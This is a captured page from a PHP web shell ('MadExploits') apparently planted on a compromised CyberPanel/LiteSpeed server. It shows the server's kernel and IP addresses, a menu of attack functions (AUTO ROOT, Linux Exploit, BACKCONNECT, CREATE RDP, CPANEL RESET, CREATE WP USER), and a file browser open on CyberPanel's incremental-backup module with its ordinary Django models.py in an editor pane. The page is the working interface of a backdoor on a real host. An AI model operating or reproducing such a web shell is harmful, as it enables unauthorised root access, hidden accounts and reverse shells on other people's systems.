Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
IncBackups /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
IncBackupPath.py
160
B
-rw-r--r--
IncBackupProvider.py
137
B
-rw-r--r--
IncBackups.py
16.16
KB
-rw-r--r--
IncBackupsControl.py
40.41
KB
-rw-r--r--
IncScheduler.py
508
B
-rw-r--r--
__init__.py
0
B
-rw-r--r--
admin.py
89
B
-rw-r--r--
apps.py
121
B
-rw-r--r--
models.py
1.58
KB
-rw-r--r--
tests.py
1.16
KB
-rw-r--r--
urls.py
3.11
KB
-rw-r--r--
views.py
46.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : models.py
from django.db import models from websiteFunctions.models import Websites from loginSystem.models import Administrator from datetime import datetime class IncJob(models.Model): website = models.ForeignKey(Websites, on_delete=models.CASCADE) date = models.DateTimeField(default=datetime.now, blank=True) class JobSnapshots(models.Model): job = models.ForeignKey(IncJob, on_delete=models.CASCADE) type = models.CharField(max_length=300) snapshotid = models.CharField(max_length=50) destination = models.CharField(max_length=200, default='') class BackupJob(models.Model): destination = models.CharField(max_length=300) frequency = models.CharField(max_length=50) websiteData = models.IntegerField() websiteDatabases = models.IntegerField() websiteDataEmails = models.IntegerField() retention = models.IntegerField(default=0) # 0 being unlimited retention class JobSites(models.Model): job = models.ForeignKey(BackupJob, on_delete=models.CASCADE) website = models.CharField(max_length=300) class OneClickBackups(models.Model): owner = models.ForeignKey(Administrator, on_delete=models.PROTECT) planName = models.CharField(max_length=100) months = models.CharField(max_length=100) price = models.CharField(max_length=100) customer = models.CharField(max_length=300) subscription = models.CharField(max_length=300, unique=True) sftpUser = models.CharField(max_length=100) config = models.TextField(default='{}') date = models.DateTimeField(default=datetime.now, blank=True) state = models.IntegerField(default=0)
Close